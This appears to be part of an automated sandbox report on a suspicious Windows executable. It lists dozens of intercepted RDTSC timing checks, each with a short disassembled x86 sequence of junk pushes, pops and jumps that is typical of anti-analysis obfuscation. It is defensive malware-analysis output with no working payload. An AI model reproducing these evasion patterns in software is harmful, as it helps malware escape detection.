                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6E42 second address: 7C6E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C774E second address: 7C7761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jns 00007F5ED52EEF76h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C7808 second address: 7C781D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF47Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C781D second address: 7C786F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F5ED52EEF78h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 lea eax, dword ptr [ebp+1248825Bh] 0x00000027 jnc 00007F5ED52EEF7Ch 0x0000002d jmp 00007F5ED52EEF7Eh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jo 00007F5ED52EEF78h 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A552D second address: 7A5569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5ED4EAF494h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F5ED4EAF47Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F536D second address: 7F5372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5372 second address: 7F537A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F537A second address: 7F537E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F537E second address: 7F5382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5382 second address: 7F5396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5ED52EEF78h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5396 second address: 7F53B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF486h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F53B2 second address: 7F53B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5695 second address: 7F56DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF47Eh 0x00000009 pushad 0x0000000a jmp 00007F5ED4EAF480h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 jl 00007F5ED4EAF476h 0x00000019 popad 0x0000001a jmp 00007F5ED4EAF483h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F56DE second address: 7F5700 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5ED52EEF89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5B4A second address: 7F5B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5B4E second address: 7F5B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5ED52EEF86h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 786DD4 second address: 786DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD6BC second address: 7FD6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD6C7 second address: 7FD6D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5ED4EAF47Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD6D9 second address: 7FD6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDE12 second address: 7FDE32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDE32 second address: 7FDE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5ED52EEF76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE0D9 second address: 7FE0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE0DF second address: 7FE0F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F5ED52EEF76h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE381 second address: 7FE3C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF47Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F5ED4EAF476h 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F5ED4EAF486h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5ED4EAF47Bh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB17 second address: 7FEB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5ED52EEF76h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB25 second address: 7FEB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB2B second address: 7FEB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD3D6 second address: 7FD3DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD3DA second address: 7FD40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5ED52EEF7Dh 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jmp 00007F5ED52EEF89h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD40F second address: 7FD419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD419 second address: 7FD438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5ED52EEF80h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD438 second address: 7FD43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801C44 second address: 801C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7836A7 second address: 7836C3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5ED4EAF476h 0x00000008 jmp 00007F5ED4EAF482h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7836C3 second address: 7836E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF87h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F5ED52EEF76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807673 second address: 8076A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5ED4EAF482h 0x0000000d push ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F5ED4EAF47Fh 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8076A6 second address: 8076AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80645D second address: 806461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806461 second address: 806480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5ED52EEF89h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8065E2 second address: 8065E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8065E6 second address: 8065EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80677A second address: 806784 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5ED4EAF482h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806A9A second address: 806AAD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5ED52EEF7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806AAD second address: 806AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806AC4 second address: 806AD0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A6DB second address: 80A6E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5ED4EAF476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CB54 second address: 80CB70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810B9E second address: 810BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F5ED4EAF476h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810BB0 second address: 810BD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5ED52EEF97h 0x0000000e jmp 00007F5ED52EEF7Fh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810BD0 second address: 810BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8102D1 second address: 8102F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF89h 0x00000007 pushad 0x00000008 ja 00007F5ED52EEF76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8102F5 second address: 8102FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810887 second address: 8108AC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5ED52EEF8Fh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F5ED52EEF87h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8108AC second address: 8108B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814D2A second address: 814D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jmp 00007F5ED52EEF85h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81403F second address: 814056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF47Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814056 second address: 81405C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81419D second address: 8141B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5ED4EAF476h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F5ED4EAF476h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8141B2 second address: 8141B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8141B6 second address: 8141BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814477 second address: 814485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F5ED52EEF7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814640 second address: 81464C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5ED4EAF476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81464C second address: 814651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780102 second address: 780106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A1EE second address: 81A1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A1F2 second address: 81A1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A1F8 second address: 81A21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F5ED52EEF76h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F5ED52EEF86h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A21D second address: 81A223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823398 second address: 82339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82339C second address: 8233A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233A0 second address: 8233B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jl 00007F5ED52EEF76h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233B5 second address: 8233B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233B9 second address: 8233C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233C1 second address: 8233D5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5ED4EAF47Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233D5 second address: 8233D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82168F second address: 8216AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5ED4EAF476h 0x0000000a jg 00007F5ED4EAF476h 0x00000010 popad 0x00000011 jnp 00007F5ED4EAF484h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8219CC second address: 821A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b jc 00007F5ED52EEF92h 0x00000011 jmp 00007F5ED52EEF86h 0x00000016 jp 00007F5ED52EEF76h 0x0000001c pop eax 0x0000001d push edi 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821A00 second address: 821A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821A0A second address: 821A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821C74 second address: 821C90 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5ED4EAF476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5ED4EAF47Eh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822545 second address: 82255D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF84h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822DE5 second address: 822E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF485h 0x00000007 jno 00007F5ED4EAF476h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F5ED4EAF476h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8230AC second address: 8230B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8230B2 second address: 8230D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F5ED4EAF476h 0x0000000d jmp 00007F5ED4EAF489h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8230D8 second address: 8230E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8230E0 second address: 823102 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF48Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823102 second address: 823108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823108 second address: 82310C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828D0A second address: 828D10 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C4E3 second address: 82C4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833CF9 second address: 833D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Dh 0x00000009 popad 0x0000000a jbe 00007F5ED52EEF8Eh 0x00000010 pushad 0x00000011 jns 00007F5ED52EEF76h 0x00000017 ja 00007F5ED52EEF76h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834866 second address: 83487C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF480h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83487C second address: 834882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834882 second address: 834886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
